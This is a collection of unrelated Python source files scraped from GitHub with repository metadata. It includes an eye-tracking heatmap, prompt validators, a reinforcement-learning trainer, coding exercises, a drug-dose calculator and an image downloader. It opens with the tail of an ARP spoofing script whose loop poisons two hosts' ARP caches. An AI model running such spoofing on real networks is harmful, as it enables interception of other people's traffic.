hwsrc=source_mac, hwdst=dest_mac), \n count=4, verbose=False)\n\nif __name__ == \"__main__\":\n spc = 0\n args = get_arguments()\n try:\n print(\"Starting ARP Spoofing\")\n while True:\n spoof(str(args.ip1), str(args.ip2))\n spoof(str(args.ip2), str(args.ip1))\n print(\"\\rSent Packages: \", str(spc), end=\"\")\n spc += 2\n sleep(1)\n except KeyboardInterrupt:\n print(\"\\n\\nDetected CTRL + C, stopping ARP Spoofing and restoring ARP tables\")\n restore(str(args.ip1), str(args.ip2))\n restore(str(args.ip2), str(args.ip1))\n except:\n print(\"\\n\\nAn unexpected error has ocurred\\n\")\n","repo_name":"TheCaustic-X/My_Python_Things","sub_path":"Hacking/ARPSpooferV1.0.py","file_name":"ARPSpooferV1.0.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"42200417921","text":"import sys\nimport os\n\n\n# Commands\nimport commands.add as ADD\nimport commands.list as LIST\nimport commands.rm as RM\nimport commands.run as RUN\nimport commands.getConfig as GET\nimport commands.show as SHOW\nimport commands.init as INIT\n\nCOMMAND = sys.argv[1]\nhelpText = \"\"\"🔜 Soon to be implemented\"\"\"\n\nif __name__ == '__main__':\n \n \n if COMMAND == 'h' or COMMAND == 'help':\n print(helpText)\n elif COMMAND == 'init':\n INIT.init()\n\n elif COMMAND == 'install':\n ADD.add(sys.argv[2])\n \n\n elif COMMAND == 'rm' or COMMAND == 'remove':\n RM.rm(sys.argv[2])\n \n elif COMMAND == 'list' or COMMAND == 'ls':\n LIST.list()\n \n elif COMMAND == 'update' or COMMAND == 'u':\n print('🔜 Soon to be implemented')\n \n elif COMMAND == 'show':\n SHOW.show(sys.argv[2])\n \n elif COMMAND == 'r' or COMMAND == 'run':\n RUN.run(sys.argv[2])\n\n \n \n else:\n print('❌ Unknown command')\n","repo_name":"katistix/bpm","sub_path":"bpm.py","file_name":"bpm.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"11740525791","text":"import os\nimport argparse\nimport csv\nimport numpy\nimport matplotlib\nfrom matplotlib import pyplot, image\n\n\nclass Heatmap:\n\n def draw_display(self, dispsize, imagefile=None):\n # construct screen (black background)\n screen = numpy.zeros((dispsize[1], dispsize[0], 3), dtype='float32')\n # if an image location has been passed, draw the image\n if imagefile != None:\n # check if the path to the image exists\n if not os.path.isfile(imagefile):\n raise Exception(\"ERROR in draw_display: imagefile not found at '%s'\" % imagefile)\n # load image\n img = image.imread(imagefile)\n\n # width and height of the image\n w, h = len(img[0]), len(img)\n # x and y position of the image on the display\n x = int(dispsize[0] / 2 - w / 2)\n y = int(dispsize[1] / 2 - h / 2)\n # draw the image on the screen\n screen[y:y + h, x:x + w, :] += img\n # dots per inch\n dpi = 100.0\n # determine the figure size in inches\n figsize = (dispsize[0] / dpi, dispsize[1] / dpi)\n # create a figure\n fig = pyplot.figure(figsize=figsize, dpi=dpi, frameon=False)\n ax = pyplot.Axes(fig, [0, 0, 1, 1])\n ax.set_axis_off()\n fig.add_axes(ax)\n # plot display\n ax.axis([0, dispsize[0], 0, dispsize[1]])\n ax.imshow(screen) # , origin='upper')\n\n return fig, ax\n\n def gaussian(self, x, sx, y=None, sy=None):\n # square Gaussian if only x values are passed\n if y == None:\n y = x\n if sy == None:\n sy = sx\n # centers\n xo = x / 2\n yo = y / 2\n # matrix of zeros\n M = numpy.zeros([y, x], dtype=float)\n # gaussian matrix\n for i in range(x):\n for j in range(y):\n M[j, i] = numpy.exp(\n -1.0 * (((float(i) - xo) ** 2 / (2 * sx * sx)) + ((float(j) - yo) ** 2 / (2 * sy * sy))))\n\n return M\n\n def draw(self, gazepoints, dispsize, imagefile=None, alpha=0.5, savefilename=None, gaussianwh=200, gaussiansd=None):\n # IMAGE\n fig, ax = self.draw_display(dispsize, imagefile=imagefile)\n\n # HEATMAP\n # Gaussian\n gwh = gaussianwh\n gsdwh = gwh / 6 if (gaussiansd is None) else gaussiansd\n gaus = self.gaussian(gwh, gsdwh)\n # matrix of zeroes\n strt = int(gwh / 2)\n heatmapsize = dispsize[1] + 2 * strt, dispsize[0] + 2 * strt\n heatmap = numpy.zeros(heatmapsize, dtype=float)\n # create heatmap\n for i in range(0, len(gazepoints)):\n # get x and y coordinates\n x = strt + int(gazepoints[i][0]) - int(gwh / 2)\n y = strt + int(gazepoints[i][1]) - int(gwh / 2)\n # correct Gaussian size if either coordinate falls outside of\n # display boundaries\n if (not 0 < x < dispsize[0]) or (not 0 < y < dispsize[1]):\n hadj = [0, gwh];\n vadj = [0, gwh]\n if 0 > x:\n hadj[0] = abs(x)\n x = 0\n elif dispsize[0] < x:\n hadj[1] = gwh - int(x - dispsize[0])\n if 0 > y:\n vadj[0] = abs(y)\n y = 0\n elif dispsize[1] < y:\n vadj[1] = gwh - int(y - dispsize[1])\n # add adjusted Gaussian to the current heatmap\n try:\n heatmap[y:y + vadj[1], x:x + hadj[1]] += gaus[vadj[0]:vadj[1], hadj[0]:hadj[1]] * 1\n except:\n # fixation was probably outside of display\n pass\n else:\n # add Gaussian to the current heatmap\n heatmap[y:y + gwh, x:x + gwh] += gaus * 1\n # resize heatmap\n heatmap = heatmap[strt:dispsize[1] + strt, strt:dispsize[0] + strt]\n # remove zeros\n lowbound = numpy.mean(heatmap[heatmap > 0])\n heatmap[heatmap < lowbound] = numpy.NaN\n # draw heatmap on top of image\n ax.imshow(heatmap, cmap='jet', alpha=alpha)\n\n # FINISH PLOT\n # invert the y axis, as (0,0) is top left on a display\n ax.invert_yaxis()\n # save the figure if a file name was provided\n if savefilename != None:\n fig.savefig(savefilename)\n\n return fig\n","repo_name":"ddetommaso/TobiiGlassesPySuite","sub_path":"tobiiglasses/aoi/heatmaps.py","file_name":"heatmaps.py","file_ext":"py","file_size_in_byte":4417,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"76"} +{"seq_id":"4319028368","text":"import enum\nimport inspect\nimport re\nfrom typing import TYPE_CHECKING, Callable, get_type_hints\nfrom unittest import mock\n\nif TYPE_CHECKING:\n from fixieai.agents import api\n from fixieai.agents import code_shot\nelse:\n api = mock.MagicMock()\n code_shot = mock.MagicMock()\n\n\ndef strip_prompt_lines(agent_metadata: code_shot.AgentMetadata):\n \"\"\"Strips all prompt lines.\"\"\"\n agent_metadata.base_prompt = _strip_all_lines(agent_metadata.base_prompt)\n for i, fewshot in enumerate(agent_metadata.few_shots):\n agent_metadata.few_shots[i] = _strip_all_lines(fewshot)\n\n\ndef validate_code_shot_agent(agent_metadata: code_shot.AgentMetadata):\n \"\"\"A client-side validation of few_shots and agent.\"\"\"\n _validate_base_prompt(agent_metadata.base_prompt)\n for fewshot in agent_metadata.few_shots:\n _validate_few_shot_prompt(fewshot)\n\n\ndef validate_registered_pyfunc(func: Callable, agent: code_shot.CodeShotAgent):\n \"\"\"Validates `func`'s signature to be a valid CodeShot Func.\n\n Args:\n func: The function to be validated.\n agent: The CodeShotAgent that this func is going to be registered for.\n \"\"\"\n # Delayed import to avoid circular dependency\n from fixieai.agents import api\n from fixieai.agents import oauth\n from fixieai.agents import user_storage\n\n ALLOWED_FUNC_PARAMS = {\n \"query\": api.Message,\n \"user_storage\": user_storage.UserStorage,\n \"oauth_handler\": oauth.OAuthHandler,\n }\n\n # Validate that func is a function type.\n if not inspect.isfunction(func):\n raise TypeError(\n f\"Registered function {func!r} is not a function, but a {type(func)!r}.\"\n )\n signature = inspect.signature(func)\n func_name = func.__name__\n params = signature.parameters\n\n # Validate that there are not var args (*args or **kwargs).\n if any(\n param.kind in (param.VAR_KEYWORD, param.VAR_POSITIONAL)\n for param in params.values()\n ):\n raise TypeError(\n f\"Registered function {func_name} cannot accept variable args: {params!r}.\"\n )\n\n # Validate that all argument names are known.\n unknown_params = set(params.keys()) - set(ALLOWED_FUNC_PARAMS.keys())\n if unknown_params:\n raise TypeError(\n f\"Registered function {func_name} gets unknown arguments {unknown_params}. \"\n f\"List of allowed Func arguments are {list(ALLOWED_FUNC_PARAMS.keys())}.\"\n )\n\n # Check the type annotations match what's expected, if func is type annotated.\n type_hints = get_type_hints(func)\n for arg_name, arg_type in ALLOWED_FUNC_PARAMS.items():\n if arg_name in type_hints and type_hints[arg_name] != arg_type:\n raise TypeError(\n f\"Expected argument {arg_name!r} to be of type {arg_type!r}, but it's \"\n f\"typed as {type_hints[arg_name]!r}.\"\n )\n if \"return\" in type_hints and type_hints[\"return\"] not in (\n api.AgentResponse,\n api.Message,\n str,\n ):\n raise TypeError(\n f\"Expected registered function to return an AgentResponse, a Message, \"\n f\"or str but it returns {type_hints['return']}.\"\n )\n\n # Some custom checks.\n if \"oauth_handler\" in params and agent.oauth_params is None:\n raise TypeError(\n f\"Function {func_name} who accepts 'oauth_handler' as an argument cannot \"\n f\"be registered with agent {agent!r} who hasn't set 'oauth_params' in its \"\n \"constructor.\"\n )\n\n return func\n\n\ndef _strip_all_lines(prompt: str) -> str:\n prompt = prompt.strip()\n return \"\\n\".join(line.strip() for line in prompt.splitlines())\n\n\ndef _validate_base_prompt(base_prompt: str):\n if base_prompt.endswith(\"\\n\") or base_prompt.startswith(\"\\n\"):\n raise ValueError(\n \"base_prompt should not start or end in newlines. \"\n f\"base_prompt={base_prompt!r}.\"\n )\n whitespaces = (\" \", \"\\t\", \"\\r\")\n prompt_lines = base_prompt.split(\"\\n\")\n bad_lines = [\n line\n for line in prompt_lines\n if line.startswith(whitespaces) or line.endswith(whitespaces)\n ]\n if bad_lines:\n raise ValueError(\n f\"Some lines in the base prompt start or end in whitespaces: {bad_lines!r}.\"\n )\n\n\nclass FewshotLinePattern(enum.Enum):\n QUERY = re.compile(r\"^Q:\")\n AGENT_SAYS = re.compile(r\"^Agent\\[\\w+] says:\")\n FUNC_SAYS = re.compile(r\"^Func\\[\\w+] says:\")\n ASK_AGENT = re.compile(r\"^Ask Agent\\[\\w+]:\")\n ASK_FUNC = re.compile(r\"^Ask Func\\[\\w+]:\")\n RESPONSE = re.compile(r\"^A:\")\n NO_PATTERN: None = None\n\n @classmethod\n def pattern(cls, line: str) -> \"FewshotLinePattern\":\n \"\"\"Returns the matched PromptPattern for a given line.\"\"\"\n if \"\\n\" in line:\n raise ValueError(\n \"Cannot get the pattern for a multi-line text. Patterns must be \"\n \"extracted one line at a time.\"\n )\n pattern_matches = [\n prompt_pattern\n for prompt_pattern in cls\n if prompt_pattern is not cls.NO_PATTERN and prompt_pattern.value.match(line)\n ]\n if len(pattern_matches) > 1:\n raise RuntimeError(\n f\"More than one pattern ({pattern_matches}) matched the line {line!r}.\"\n )\n elif len(pattern_matches) == 1:\n return pattern_matches[0]\n else:\n return cls.NO_PATTERN\n\n\ndef _validate_few_shot_prompt(prompt: str):\n \"\"\"Validates 'prompt' as a correctly formatted few shot prompt.\"\"\"\n lines = prompt.splitlines(False)\n\n # Check that no line starts or ends in a whitespace.\n whitespaces = (\" \", \"\\t\", \"\\r\")\n bad_lines = [\n line\n for line in lines\n if line.startswith(whitespaces) or line.endswith(whitespaces)\n ]\n _assert(\n not bad_lines,\n f\"Some lines in the fewshot start or end in whitespaces: {bad_lines!r}.\",\n prompt,\n )\n\n # Check that it doesn't end with newline\n _assert(not prompt.endswith(\"\\n\"), \"Fewshot ends with newline.\", prompt)\n\n # Check that fewshot starts with a Q:, ends in an A:, and a Func says and Agent\n # says follows every Ask Func and Ask Agent.\n lines_patterns = [FewshotLinePattern.pattern(line) for line in lines]\n _assert(\n lines_patterns[0] is FewshotLinePattern.QUERY,\n \"Fewshot must start with a 'Q:'\",\n prompt,\n )\n last_pattern = FewshotLinePattern.QUERY\n for i, pattern in enumerate(lines_patterns):\n if pattern is FewshotLinePattern.ASK_AGENT:\n _assert(\n i + 1 < len(lines_patterns)\n and lines_patterns[i + 1] is FewshotLinePattern.AGENT_SAYS,\n \"Each 'Ask Agent' line must be followed by an 'Agent says' line.\",\n prompt,\n )\n if pattern is FewshotLinePattern.ASK_FUNC:\n _assert(\n i + 1 < len(lines_patterns)\n and lines_patterns[i + 1] is FewshotLinePattern.FUNC_SAYS,\n \"Each 'Ask Func' line must be followed by an 'Func says' line.\",\n prompt,\n )\n if pattern is not FewshotLinePattern.NO_PATTERN:\n last_pattern = pattern\n _assert(\n last_pattern is FewshotLinePattern.RESPONSE,\n f\"Fewshot must end with a 'A:' pattern, but it ends with {last_pattern}\",\n prompt,\n )\n\n # Check that there's Q: and A: lines are interleaved.\n all_qa_lines = [\n \"Q\" if pattern is FewshotLinePattern.QUERY else \"A\"\n for pattern in lines_patterns\n if pattern in (FewshotLinePattern.QUERY, FewshotLinePattern.RESPONSE)\n ]\n qa_str = \"\".join(all_qa_lines)\n _assert(\n qa_str.replace(\"QA\", \"\") == \"\",\n \"Q: and A: lines must be interleaved in fewshot.\",\n prompt,\n )\n\n\ndef _assert(condition: bool, msg: str, prompt: str):\n if not condition:\n raise ValueError(f\"{msg} in few-shot prompt: {prompt!r}.\")\n","repo_name":"rravipra/fixie-sdk","sub_path":"fixieai/agents/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"76"} +{"seq_id":"25551959500","text":"import pandas as pd\nimport intraday_environment\nfrom sac_tf2 import Agent\nfrom tf_agents.environments import tf_py_environment\nimport matplotlib.pyplot as plt\n\nn_episodes = 10000\n\n# Environment\nSOC = 50\ndf = pd.read_csv('test_from_11_0to_13_45.csv')\n\nenvironment = intraday_environment.IntradayEnv(df, SOC)\nenv = tf_py_environment.TFPyEnvironment(environment)\n\n# Agent parameters\nn_actions = env.action_spec().shape[0]\ninput_dims = env.observation_spec().shape\nmax_action = env.action_spec().maximum.max()\n\n# Initialize agent\nagent = Agent(n_actions, input_dims, max_action, batch_size=64)\n\n# Training\nscore_history = []\nvalue_loss = []\nactor_loss = []\ncritic1_loss = []\ncritic2_loss = []\n\nplt.ion()\n# fig1, (ax1, ax2, ax3, ax4) = plt.subplots(1, 4)\n\nfor i in range(n_episodes):\n\n observation = environment.reset_new()\n done = False\n score = 0\n\n # Start the episode and run until it's finished\n while not done:\n action = agent.choose_action(observation)\n observation_, reward, done, info = environment.step_new(action)\n score = score + environment.total_revenue\n\n agent.remember(observation, action, reward, observation_, done)\n\n agent.learn()\n\n observation = observation_\n\n # Keep track of the episode's score\n score_history.append(score)\n\n # Print training info\n print(f'episode: {i}, score: {score:.2f}')\n\n if len(agent.value_loss_log):\n value_loss.append(sum(agent.value_loss_log[-environment.episode_steps:])/environment.episode_steps)\n actor_loss.append(sum(agent.actor_loss_log[-environment.episode_steps:]) / environment.episode_steps)\n critic1_loss.append(sum(agent.critic1_loss_log[-environment.episode_steps:]) / environment.episode_steps)\n critic2_loss.append(sum(agent.critic2_loss_log[-environment.episode_steps:]) / environment.episode_steps)\n\n # ax1.plot(value_loss)\n # ax2.plot(actor_loss)\n # ax3.plot(critic1_loss)\n # ax4.plot(critic2_loss)\n # plt.draw()\n # plt.pause(0.02)\n\n print(value_loss)\n print(actor_loss)\n print(critic1_loss)\n print(critic2_loss)\n\n print(score_history)\n\n# Save the model\nagent.save_models()\n\n# Plot the score curve\nfig1, (ax1, ax2, ax3, ax4) = plt.subplots(1, 4)\nax1.plot(value_loss)\nax2.plot(actor_loss)\nax3.plot(critic1_loss)\nax4.plot(critic2_loss)\nplt.draw()\n\nx = [i for i in range(n_episodes)]\nfig = plt.figure()\nplt.plot(x, score_history)\nplt.title('Score over episodes')\nplt.ioff()\nplt.show()\n","repo_name":"mitre7/trading_agent_intraday","sub_path":"main_sac_tf2.py","file_name":"main_sac_tf2.py","file_ext":"py","file_size_in_byte":2515,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"39769919601","text":"class Solution:\n def score(self, nums, l, r, dp):\n if dp[l][r] != -1:\n return dp[l][r]\n if l == r:\n return nums[l]\n \n left = nums[l] - self.score(nums, l + 1, r, dp)\n right = nums[r] - self.score(nums, l, r - 1, dp)\n dp[l][r] = max(left, right)\n \n return dp[l][r]\n \n def PredictTheWinner(self, nums):\n n = len(nums)\n dp = [[-1 for _ in range(n)] for _ in range(n)]\n \n return self.score(nums, 0, n - 1, dp) >= 0","repo_name":"amanovishnu/LeetCode","sub_path":"0486-predict-the-winner/0486-predict-the-winner.py","file_name":"0486-predict-the-winner.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"76"} +{"seq_id":"41891783462","text":"from check import timer, calls_counter\n\n\n@calls_counter\n@timer\ndef fibonacci_sum(n):\n \"\"\"\n Вычисление последней цифры суммы первых n чисел в последовательности Фибоначчи.\n В данном случае сложность O(n), но если числа будут очень большими, то сложность может увеличиться до O(n^2)\n \"\"\"\n if n <= 1:\n return n\n\n previous, current, _sum = 0, 1, 1\n\n for _ in range(n - 1):\n previous, current = current, previous + current\n _sum += current\n\n return _sum % 10\n\n\n@calls_counter\n@timer\ndef fibonacci_sum_fast(n):\n \"\"\"\n Вычисление последней цифры суммы первых n чисел в последовательности Фибоначчи.\n Используем оператор % 60, это связано с периодичностью последних цифр суммы чисел Фибоначчи.\n После некоторого количества чисел Фибоначчи, последние цифры начинают повторяться в циклическом порядке.\n Этот цикл имеет длину 60.\n Представьте, что вы считаете сумму первых 1000 чисел Фибоначчи. Вместо того чтобы действительно выполнять вычисления\n для всех 1000 чисел, вы можете просто найти остаток от деления 1000 на 60, что равно 40. Теперь вы знаете, что\n последняя цифра суммы первых 1000 чисел Фибоначчи также будет последней цифрой суммы первых 40 чисел Фибоначчи.\n Сложность O(n), даже если числа будут очень большими.\n \"\"\"\n if n <= 1:\n return n\n\n lesser = (n + 2) % 60\n\n if lesser == 1:\n return 0\n elif lesser == 0:\n return 9\n\n a, b = 0, 1\n for _ in range(2, lesser + 1):\n c = a + b\n c = c % 10\n b, a = c, b\n\n if c != 0:\n return c - 1\n else:\n return 9\n\n\nif __name__ == '__main__':\n n = int(input('Введите число для вычисления Фибоначчи: '))\n print(fibonacci_sum(n))\n print('***************************************************************************************************')\n print(fibonacci_sum_fast(n))\n","repo_name":"horonzhin/algorithms","sub_path":"courses/algorithmic_toolbox_coursera/week2_algorithmic_warmup/6_last_digit_of_the_sum_of_fibonacci_numbers_frequency_60.py","file_name":"6_last_digit_of_the_sum_of_fibonacci_numbers_frequency_60.py","file_ext":"py","file_size_in_byte":2604,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"20209861669","text":"# Problem Link https://leetcode.com/problems/missing-number/\n\ndef missing_numbers(nums):\n nums = set(nums)\n n = len(nums)\n\n for i in range(n+1):\n if i not in nums:\n return i\n\n\nprint(missing_numbers([0,1]))\n","repo_name":"hasinur1997/leetconde","sub_path":"268. Missing Number.py","file_name":"268. Missing Number.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"13582616195","text":"#친구 관리 프로그램 함수화\n\nprint('친구 관리 프로그램')\nprint('==========================')\nclist=[]\ndef show():\n print(clist) #global 처리 안해도되나?\n\ndef append():\n name= input('이름을 선택: ')\n clist.append(name)\n\ndef delete():\n name = input('삭제할 이름 입력: ')\n clist.remove(name)\n show()\n\ndef change():\n name = input('변경할 이름 선택: ')\n newname = input('변경하고 싶은 이름 입력: ')\n clist[clist.index(name)] = newname\n show()\n\ndef finish():\n print('종료')\n\nwhile True:\n print('1. 친구 리스트 출력')\n print('2. 친구 추가')\n print('3. 친구 삭제')\n print('4. 이름 변경')\n print('9. 종료')\n num = int(input('메뉴를 선택: '))\n\n if num == 1:\n show()\n if num == 2:\n append()\n if num == 3:\n delete()\n if num == 4:\n change()\n if num == 9:\n finish()\n break\n print('------------------')","repo_name":"kmdn998/Acorn_Python","sub_path":"pycharm/controlProject/고객관리v1.py","file_name":"고객관리v1.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71953616565","text":"# 신입 사원 선발\r\nimport sys\r\n\r\nm = sys.stdin.readline\r\n\r\ncase = int(m())\r\nanswer = []\r\n\r\nfor c in range(case):\r\n candidate = []\r\n num = int(m())\r\n plus = 1\r\n\r\n for _ in range(num):\r\n candidate.append(list(map(int, m().split())))\r\n \r\n candidate.sort()\r\n \r\n # 1등의 2번 등수\r\n standard = candidate[0][1]\r\n \r\n for c in candidate:\r\n # 2번 등수 높다 = 1개 부분이라도 순위 더 높음\r\n # 새로운 기준점\r\n if c[1] < standard:\r\n standard = c[1]\r\n plus += 1\r\n\r\n answer.append(plus)\r\n\r\nfor a in answer:\r\n print(a)","repo_name":"Chunws13/Study","sub_path":"Greedy/1946.py","file_name":"1946.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"20217025066","text":"import utils\nimport re\ndef get_idea_package_direct_download_link():\n html_content = utils.download_html(\"https://www.jetbrains.com/intellij-repository/releases\")\n second_part=html_content.split(\"com.jetbrains.intellij.idea\")\n results = re.search(\"(?<=)([0-9]|\\.)*(?=)\", second_part[1])\n version = results[0]\n print(\"https://download.jetbrains.com/idea/ideaIC-\" + version + \".tar.gz\")\nif __name__ == \"__main__\":\n get_idea_package_direct_download_link()\n","repo_name":"rxue/linux_scripts","sub_path":"configuration/python/get_idea_package_direct_download_link.py","file_name":"get_idea_package_direct_download_link.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"1602846459","text":"import os, re\nimport datetime\nfrom datetime import date\n\n# the directory where the csv file is located\nos.chdir(\"/workingdir/\")\n\n# output csv file\nimport csv\nwith open('output.csv', 'w', newline='', encoding = 'utf-8') as fcsv:\n fieldnames = ['patient', 'olzdose', 'totaldays']\n writer = csv.DictWriter(fcsv, fieldnames = fieldnames)\n \n writer.writeheader()\n \n fp = open(\"test.csv\")\n # initialising patiend id, which is data[1]\n patient = '7603594'\n # initialising olzdose & totaldays\n olzdose = 0.0\n temp_olzdose = 0.0\n avg_olzdose = 0.0\n totaldays = 0.0\n temp_days = 0.0\n dates = []\n prescription_date = date(2000,1,1)\n print(prescription_date)\n # [1:] for skipping the top row, if it has headers\n for line in fp.readlines()[1:]:\n data = line.split(',')\n print(data)\n # chemical name and dosage in mg\n # chemical names in the original dataset here = \n # ['Amisulpride', 'Aripiprazole', 'Blonanserin', 'Haloperidol', 'Olanzapine', 'Paliperidone', 'Quetiapine', 'Risperidon', Risperidon Disp, 'Risperidone', Risperidone Disp, 'Ziprasidone', 'Zyprexa' zydis*, Zyprexa Zydis*]\n # olanzapine equivalent doses were referenced from S Leucht et al., Schizophr Bull 2015;41(6):1397-1402\n drugs = {'Amisulpride':38.3, 'Aripiprazole':1.4, 'Blonanserin':1.6, 'Chlorpromazine':38.9, 'Clozapine':30.6, 'Haloperidol':0.7, 'Olanzapine':1.0, 'Paliperidone':0.6, 'Quetiapine':32.3, 'Risperidone':0.4, 'Ziprasidone':7.9, 'Zotepine':13.2}\n names = data[7] ## <-- 'drug names' here\n # the first element on the list is the chemical name\n chemical = names.split(' ')\n if patient == data[1]: ## <-- 'patient ID' here\n if chemical[0] in drugs:\n # \\s: a space between chemical names and dosage, \\d: dosage, .{0,4}: whatever numbers or characters till 'mg'\n m1 = re.search('(\\s)(\\d+.{0,4})(mg)', data[7]) ## <-- 'drug names' here\n # taking numbers only and then converting into float\n dosage = float(m1.group(2))\n # totaltabs is the total number of prescribed tablets\n totaltabs = float(data[8]) ## <-- 'prescribed tabs per day' here\n temp_days = float(data[12]) ## <-- 'prescription days' here\n # skip the row if temp_days == 0\n if temp_days == 0:\n print(\"it is a prn medication: skipping the row\")\n continue\n # the total dosage = totaltabs multiplied by dosage per tab and prescribed days\n totaldose = dosage * totaltabs * temp_days\n # olzdose is olanzapine equivalent dosage of 'totaldose'\n olzdose = totaldose / drugs[chemical[0]]\n # if it is the same patient, sum up the olzdose till the next patient comes up\n temp_olzdose = temp_olzdose + olzdose\n # dates is a list of all the prescription dates in this patient\n # append the prescription date to the list 'dates'\n m2 = re.search('(\\d+)(\\-)(\\d+)(\\-)(\\d+)', data[6]) ## <-- 'prescription date' here\n # if it is prescribed on the same day, do not count temp_days\n if prescription_date == date(int(m2.group(1)), int(m2.group(3)), int(m2.group(5))):\n totaldays = totaldays\n # otherwise, if it is a new prescription date, sum up temp_days to total days\n else:\n totaldays = totaldays + temp_days\n prescription_date = date(int(m2.group(1)), int(m2.group(3)), int(m2.group(5)))\n dates.append(prescription_date)\n print(patient, 'totaldose', totaldose)\n print(patient, 'prescription_date', prescription_date)\n print(patient, 'temp_olzdose', temp_olzdose)\n print(patient, 'temp_days', temp_days)\n print(patient, 'totaldays', totaldays)\n print(patient, 'avg_olzdose', avg_olzdose)\n else:\n print('not antipsychotics')\n else:\n # if it is the next patient, calculate the average olzdose\n # totaldays = (max(dates)-min(dates)).days ## it is for inpatients maybe\n if totaldays == 0:\n #returns 0 as average dose when the patient got prescription for 0 day since divding with 0 returns error\n avg_olzdose = 0\n else:\n avg_olzdose = temp_olzdose / totaldays\n print('******************next patient*********************')\n # then write the patient ID and summed olzdose to the csv file\n writer.writerow({'patient': patient, 'olzdose': avg_olzdose, 'totaldays': totaldays})\n # and then initialise parameters for the next patient\n avg_olzdose = 0.0\n totaldays = 0.0\n temp_olzdose = 0.0\n dates = []\n patient = data[1] ## <-- 'patient ID' here\n # after initialising, process the first row of the next patient\n if chemical[0] in drugs:\n # \\s: a space between chemical names and dosage, \\d: dosage, .{0,4}: whatever numbers or characters till 'mg'\n m1 = re.search('(\\s)(\\d+.{0,4})(mg)', data[7]) ## <-- 'drug name' here\n # taking numbers only and then converting into float\n dosage = float(m1.group(2))\n # totaltabs is the total number of prescribed tablets\n totaltabs = float(data[8]) ## <-- 'prescribed tabs per day' here\n temp_days = float(data[12]) ## <-- 'prescription days' here\n # the total dosage = totaltabs multiplied by dosage per tab and prescribed days\n totaldose = dosage * totaltabs * temp_days\n # olzdose is olanzapine equivalent dosage of 'totaldose'\n olzdose = totaldose / drugs[chemical[0]]\n # if it is the same patient, sum up the olzdose till the next patient comes up\n temp_olzdose = temp_olzdose + olzdose\n # dates is a list of all the prescription dates in this patient\n # append the prescription date to the list 'dates'\n m2 = re.search('(\\d+)(\\-)(\\d+)(\\-)(\\d+)', data[6]) ## <-- 'prescription date' here\n # if it is prescribed on the same day, do not count temp_days\n if prescription_date == date(int(m2.group(1)), int(m2.group(3)), int(m2.group(5))):\n totaldays = totaldays\n # otherwise, if it is a new prescription date, sum up temp_days to total days\n else:\n totaldays = totaldays + temp_days\n prescription_date = date(int(m2.group(1)), int(m2.group(3)), int(m2.group(5)))\n dates.append(prescription_date)\n print(patient, 'totaldose', totaldose)\n print(patient, 'prescription_date', prescription_date)\n print(patient, 'temp_olzdose', temp_olzdose)\n print(patient, 'temp_days', temp_days)\n print(patient, 'totaldays', totaldays)\n print(patient, 'avg_olzdose', avg_olzdose)\n else:\n print('not antipsychotics')\n patient = data[1] ## <-- '환자번호' here\n # write the avg_olzdose of the last patient to the csv file\n avg_olzdose = temp_olzdose / totaldays\n writer.writerow({'patient': patient, 'olzdose': avg_olzdose, 'totaldays': totaldays})\n fp.close()\n","repo_name":"drjlee/antipsychotics-equivalent-dose-calculator","sub_path":"Med_dose_v3.py","file_name":"Med_dose_v3.py","file_ext":"py","file_size_in_byte":7617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"7951916270","text":"#!/usr/bin/python3\n\"\"\"\nFrom list in local text file download images, and save on local drive.\n\"\"\"\n\nimport argparse\nimport os\nimport sys\nimport urllib\nimport colorama\nfrom urllib.request import urlopen\nfrom multiprocessing import Pool\n\n\ndef input_parser():\n \"\"\"parse argument and and return input file\"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('-i', dest='input_file', required=True,\n help='input file with list')\n parser.add_argument('-o', dest='dst_dir', required=True,\n help='destination path')\n parser.add_argument('-n', dest=\"number_of_processes\", default=1, type=int,\n help=\"number of processes <=24\")\n\n return parser.parse_args()\n\n\ndef folder_creator(dst_dir):\n \"\"\"Create of output directory if not exists\"\"\"\n if not os.path.exists(dst_dir):\n os.makedirs(dst_dir)\n print('Destination folder not exists and will be created')\n\n\ndef download_image(url, dst_dir):\n try:\n reply = urlopen(url)\n except urllib.error.HTTPError:\n print(colorama.Fore.RED + \"[!] 404 NOT FOUND: {}\".format(url) + colorama.Fore.RESET)\n return None\n file_name = url_converter(url)\n src_file = os.path.join(dst_dir, file_name)\n print(\"Downloading file from {} ...\".format(url))\n print(\"Writing file to local path {}\".format(src_file))\n with open(src_file, 'wb+') as f:\n f.write(reply.read())\n\n\ndef url_converter(url):\n \"\"\"url returns resource name\"\"\"\n return url.split('/')[-1]\n\n\ndef get_hrefs(input_file):\n with open(input_file, 'r') as f:\n return [row for row in f.readlines() if row.strip() != '']\n\n\ndef image_downloader(url):\n try:\n download_image(url.strip(), dst_dir)\n except ValueError:\n print(\"Done, end of source list file : {}\".format(input_file))\n sys.exit(2)\n\n\nif __name__ == \"__main__\":\n args = input_parser()\n num_of_procs = args.number_of_processes\n input_file = args.input_file\n dst_dir = args.dst_dir\n\n if not input_file:\n sys.exit(2)\n\n folder_creator(dst_dir)\n\n images_list = get_hrefs(input_file)\n\n processes = Pool(num_of_procs)\n 